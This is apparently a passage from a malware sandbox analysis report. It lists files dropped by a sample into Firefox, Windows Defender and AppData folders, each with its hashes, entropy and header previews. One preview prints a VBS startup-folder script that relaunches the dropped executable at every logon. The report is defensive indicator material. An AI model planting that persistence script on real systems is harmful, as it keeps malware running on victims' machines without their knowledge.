                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.....................................[.... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.139991025616543
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:iSwjxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ivxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1A389D60002D3D4C8CCB8EF08304200E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:58C5B23E8B5C5BAC57B4D09B76B6E4F319F5D49E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6DE3EAB23CC744287FB53741C57B6A8D9A921AE376808AD64D4DE9833263F023
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CC19503BB6E73A0711F7DACED3926C5E9A44AB71FBB2AAED552215607A58618B53CB20B18D36A45317FB5E1388CE578C8C30A159977C54B9825CA742E40D3EC9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@....................................._.... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1408512
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4411213803170675
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:MWKntIfGpDsqjnhMgeiCl7G0nehbGZpbD:H8IexDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7C46D7BFCB2651FCDD3F5D166C3FB2B3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:489815F2A9A524C38DE97E093626FB8A8B8F8194
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AA7DF67BE8F48E379346E5513F1FC242A07946D879DA4EB184FB4B239B7757B8
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:20E16CD29AF960ECB814062999092879E251C3F92AD5242BD8E32CB557F0E4840817506A52DFC539BDD099FE718B644EC6255726DFC2406B565C8BED885105CD
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@....................................V..... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1185280
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.103246805120972
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:JIhtXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:0tsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0244BC8D994236DE5B66D35CC7072581
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2D03D1D1DED10BD822CD7CE28B4EFED5E85462E2
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E942FE385CF5B2BDAC5E0E429CF99CAF0F60607BCF95F822132BB58DC81D18CD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:43F512909E8E6FBB815EF6D0801662D875AB2034B3CBB29683F56BBB1F1F46C70E4EB6AED9A2113DFB6771404FF06D2069E1D7DB15D6092C71670A1D74D1D0A9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................._.... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1531904
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.421184095822541
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Q8oREwt2ioQ3J+RMsqjnhMgeiCl7G0nehbGZpbD:Q8oRpoF4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CE447724F9137C3E901330571D544EE0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7A75BFC021CD86AA77EEB9F99E0D17914633B1FF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FCAA12F4D9B415CFAFBC2626CB8C9C2B884E3D4103DBDFCEA7FA7502E21B021B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3EA7972C3B0605BC432437B22047F1EC7498CA23F694C90366FD077FF91A16FC40A38891EDFB33E7C3862CF2284A445A2161E56DAE278851DC218D089A1DE39F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@....................................|..... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1341952
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.238571604949466
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:if8HQlDMxHwJ07wMsqjnhMgeiCl7G0nehbGZpbD:ikHQlqwJ0XDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5A793150FF83BAEAFAB2E07022DF6316
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:80883C5F971438F255BC83E799D13D12FA6BD042
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:66672321C4667BFD0475699BAD4E793CF24EE59BD458CD3D81BAB2AA2A92797E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1B628B876183E7F1023C491079750197877DA5EDDE55C836E3C382637C25864340FE6ECE77E0791A433EC56CCFD4E23EBD6C86A7BECC597D4E82CEDDCF926273
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@....................................8).... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Windows Media Player\wmpnetwk.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1534464
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.1246007044976185
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:xSEmYD6gjGPG45QVDkfXplyTyTsqjnhMgeiCl7G0nehbGZpbD:x5mYD6g2GWQVQf3yT8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BA5476495D830BDE224A67410DFD3931
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:04646A07E89F9E7B55871EA8D3ACF7C598F6BAA6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:060E3637AF548A1B6DBA786372B06B19411CC4E27072DB0E776A4BE73BABC788
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1CDDCD96119BF924E7B186EEE20598CC2A7E5130C6BBF593903BFA498DD55145B1DDB7FB95F490B9E20EAF470A7F6805B606891ADEFBACE34917DB3F7316E228
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.......................................... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\woolpress

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\tyRPPK48Mk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1622016
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.09278309438509
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:SZiGPNoWEa221SKHbFGXiUz2/zFWHnXa7hxJMHqAFjW7r:Fd8p5VUz2/BMwxCHlFg
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:991105A1FA983A769B94E9FB0B4168EE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:95C0651BA299E3933C632AF501FF0C07FFCC800D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6B7641C0FF8D2455C095EC6B3F37B65E05A55359416FEF0B42C906AA3D72FAD6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9C79D5AF6CF6A1F548F6A174FF1DD7AD4F2179085D8D172B88E180D9C747E44D19EE9B357F1D8AFC410178BFBEB66EA2CB56E431E29A452FEA84A0E6934E3A49
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:...MGQBD@WA1.NO.EWWQCTM.QBDDWA12LNO5EWWQCTMDQBDDWA12LNO5EWWIBTMJN.JD.H...O..d.?80t=6>%6%:aRS" Ae52q1!#d8,d...._#**.HZ]uCTMDQBDH,..zV.1}_.).Y.3..e:.M.O..k1._.)..p3.K.:.5.O{V.1..F).Y.3...;.M.O...0G_.)...2.K.:.5.OcV.1}_.)'X.3...;hM.O..g1|_.)...2.K.:.>"YzV.15EWWQCTMDQBDDWA12LNO5EWW..TM.PED.J.W2LNO5EWW.CVLOPLDD%D12ZLO5EWW..WMDABDD.D12L.O5UWWQATMAQCDDWA17LOO5EWWQ#MMDUBD.Y10LN.5EGWQSTMDQRDDGA12LNO%EWWQCTMDQBD..G16MNO5.PWA.TMDQBDDWA12LNO5EWWQCTMDQBD..G1.LNO5EWWQCTMDQBDDWA1.HO-EWW.RM.QBDDWA12LNO5.RWQFTMDQBDDWA12LNO5EWWQCTMDQBDj#$IFLNO.4RWQSTMD#GDDSA12LNO5EWWQCTMdQB$j%%PF-NO.<VWQ.QMD+CDD!D12LNO5EWWQCTM.QB.j3 ESLNOq.WWQSSMD_BDD.G12LNO5EWWQCTM.QB.j#-B2LNO<EWWQ3SMDSBDD.G12LNO5EWWQCTM.QB.j0'XV?NO.GWWQ.SMDUBDDWF12LNO5EWWQCTM.QB.j%2CQLNO%.WWQ.SMD.BDDSF12LNO5EWWQCTM.QB.j%$]]/NO5.FWQ.SMD!SDD.F12LNO5EWWQCTM.QB.DWA12LNO5EWWQCTMDQBDDWA12LNO5EWWQCTMDQBDDWA12LNO5EWWQCTMDQBDDWA12LNO5EWWQCTMDQBDDWA12LNO5EWWQCTMDQBDDWA12LNO5EWWQCTMDQBDDWA12LNO5EWWQCTMDQBDDWA12LNO5EWWQCTMDQBDDWA12LNO5EWWQCTMDQBDDWA12LNO5EWW

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\directory\name.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\tyRPPK48Mk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3101805
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.874408377679067
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:7JZoQrbTFZY1iaCt55r1KX4wtxCliwzlGWm4FjNLlX1USl6G5tCaOOplYEawVubA:7trbTA1YKowvCrzkWm4Z3Ffl6+C8pXao
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:94A2B51672C9FB20B8BC7EBFCBF648C0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B6BF724C582F4467FB4D87108744CAFBDBD1169B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:35A056CC53702FD3C3D9F0624EADAE17B0E00AC7F18FFD50B6A708CC27183441
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6DD9869686DFB6003A974E2130DF1843E0FC78D31A8A246A6685192140D47B06A85483C47C4DF01C56FAD1D0EAE8669E0B1BEFC47912446073E411FC16F079ED
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@..........................P................@.......@.........................T.......(............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...(............T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\73722fd785394ff7.bin

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.987892708617986
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:cEOpgsxCRCex0s9YPN3/rW3rsTugVcrIXIhY6xmSDBtKvpoxcR9b2OY8urYm:c3pgsxCRL9YPNCQFCMkDBtiSxc2NTMm
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A3A0C6F4369A58D3DF2C5422C2051427
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FF59072B5E9FAF4872FC2F21C2E4813A7A5600F5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:623E843214F5C7395957771F9C6E285366277EE6027CA7795AD71B8EBCC92DEC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E8DC2F34B7031D9C67123027E38DB7D857D312409B52DEB45A4713C1AAAF7E58567D442EA4BE67DFBAC7042023F6BB49C4103275538E3AC81E8B3F1A538D6F19
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:#G.l....T?..Rl{....P...0...........C.....G$....J..t..$$A`.V_.m..F.H..8&....?..$.~9x{.x.y.~......Y.....u....9...Te>=...k......F..5l.~...'.......[._.nm......q4...V.#4.6..9...o~5...\..0e.(jQ.c..2!J...".>_A...=#...q....'..s...B./...k;.8...v.H.[..uL..8N1..O#.\.......W.s..`.I.7.....u.3!,T.J.).|.X.$.x..J{..0...6&=d...{q..*....).6..$....'..>...E.P."..<.tN K.,.h..a9...K..]n..9.P....}T...d..*...F.u$..{B...x..N..0...r..n7N;...8+........r_....J\T%'p.?..........{..7f.qBP.c.=..%K.@$..V.R:..&...>D....<.c.H.q][..b".|IY....z...E..._9..m...Q...dUm...y.......;...T...;-u..BO$CmC.|.&...L.T....&SRP2.2!....j.j"..).P.s^pz$.b..i..X?..........\.G.\....../....r.h*....w.N..E...^..7%..(?..~.O..T.j....v9#.|..H;....5.Cm...gA@....3...[...!%.A..84lY....(j.<.:.n~.K...C.2....#m>.be.@V...Z-..`..m...q:3.....S.Y.f..%..@..{...: ........DfU./\S..L. ...%.\}T.0....>...pqK.x:....N.L...Jw.?..@.&.."YPS9.Y.Ox....1E^.^]....#........1@.zC8.d....6......e9'.......

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):268
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4209455304240626
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNloRKQ1A1z4mA2n
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D3A871A22DFC23DD6763F6002299B13A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B7934BFD389FE7FBDC08710EDABA4C16D3EED618
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FEA868420602CDAF96C19BE169F6BA44178494DB3B8F6292DCD7B8A8BB194F66
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6166B8A0DED88F7C8F3CC1D92A44A0A112B4CFCBEEB3934005E89B32614C79BB7F7ABDBF8CF84D90D4864C425460673739935562B344AE14FFE1076F5D0F7CA9
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\DtcInstall.log

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2313
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.133697751555109
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786e:Z070s0Y0q0mF7Dm5x
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:04987D3EEAB6F4C0EB5FF7E23FC5B4E1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4887B45FF88DC6BE78CBEA527BE5841D40E39FCD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:67EE0B77D9AE564BD89BE745991937A4ECB531D4CD3F45E7B0C54D46389D860F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:73FE8526D4AFA7C65AC91C43923D552AB434069D11DEEC5BBA2F7D75EA68E16B64D0BEB67F8368E146BCC97BFA5843FDCB20C266A4DC643C971841AD6D9D2DD6
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "-\303z{"
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.9470711344088716
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:QzA/isLTOUpVkhPYPIBsssPSsuEEatV/7PiP7PcPxYMANa9RRtdJdEbb:x/isFIHuTEgfZJw
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BBB2BDCC16A5D5F290D8767984A5A842
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F5D6B349217B3AF321F2E971EA2E96F097C92C61
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5B749615E3683292F6962846BB691701A69DEBF48F06CF9B5B3C9C2545E5B9D4
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:361A77185EF12D90EA182759E40D12439915A5F86871EC6B066C8A71F0B5F370B5B836A8A15CF839A93D401E894D7BE34D6C6FF892A3B8B2073949FEDC37014F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.(..@...@...........................................!...........................`...,...-.z{.............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O...........................W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.`...,...-.z{................................................................8.B.-.z{....19041.1.amd64fre.vb_release.191206-1406.....,.@.-.z{...............'"a.-....spp.pdb...........@.-.z{.....T.c..i.\.C.s"8@....vssvc.pdb......./.@.-.z{....W.p.D.......]....vssapi.pdb......-.@.-.z{.....\..Q....T*&.......udfs.pdb........0.@.-.z{......B..,`..9..4.....ifsutil.pdb.....-.@.-.z{....I:...S%9.`...'.R....uudf.pdb........1.@.-.z{...........1$OI"......wbengine.pdb................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1150976
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.038884296862169
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
